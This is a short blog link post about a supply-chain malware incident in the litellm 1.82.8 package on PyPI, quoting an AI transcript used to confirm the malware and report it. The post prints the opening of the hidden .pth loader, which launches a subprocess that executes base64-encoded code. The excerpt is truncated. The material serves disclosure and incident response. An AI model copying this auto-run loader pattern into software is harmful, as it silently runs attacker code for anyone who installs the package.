My minute-by-minute response to the LiteLLM malware attack

Simon Willison’s Weblog Subscribe Sponsored by: WorkOS — Ready to sell to Enterprise clients? Build and ship securely with WorkOS. My minute-by-minute response to the LiteLLM malware attack (via) Callum McMahon reported the LiteLLM malware attack to PyPI. Here he shares the Claude transcripts he used to help him confirm the vulnerability and decide what to do about it. Claude even suggested the PyPI security contact address after confirming the malicious code in a Docker container: Confirmed. Fresh download from PyPI right now in an isolated Docker container: Inspecting: litellm-1.82.8-py3-none-any.whl FOUND: litellm_init.pth SIZE: 34628 bytes FIRST 200 CHARS: import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('aW1wb3J0IHN1YnByb2Nlc3MKaW1wb3J0IHRlbXBmaWxl... The malicious litellm==1.82.8 is live on PyPI right now and anyone installing or upgrading litellm will be infected. This needs to be reported to security@pypi.org immediately. I was chuffed to see Callum use my claude-code-transcripts tool to publish the transcript of the conversation. Posted 26th March 2026 at 11:58 pm Recent articles Experimenting with Starlette 1.0 with Claude skills - 22nd March 2026 Profiling Hacker News users based on their comments - 21st March 2026 Thoughts on OpenAI acquiring Astral and uv/ruff/ty - 19th March 2026 This is a link post by Simon Willison, posted on 26th March 2026. pypi 46 security 585 ai 1933 generative-ai 1714 llms 1680 claude 264 supply-chain 14 Monthly briefing Sponsor me for $10/month and get a curated email digest of the month's most important LLM developments. Pay me to send you less! Sponsor & subscribe Disclosures Colophon © 2002 2003 2004 2005 2006 2007 2008 2009 2010 2011 2012 2013 2014 2015 2016 2017 2018 2019 2020 2021 2022 2023 2024 2025 2026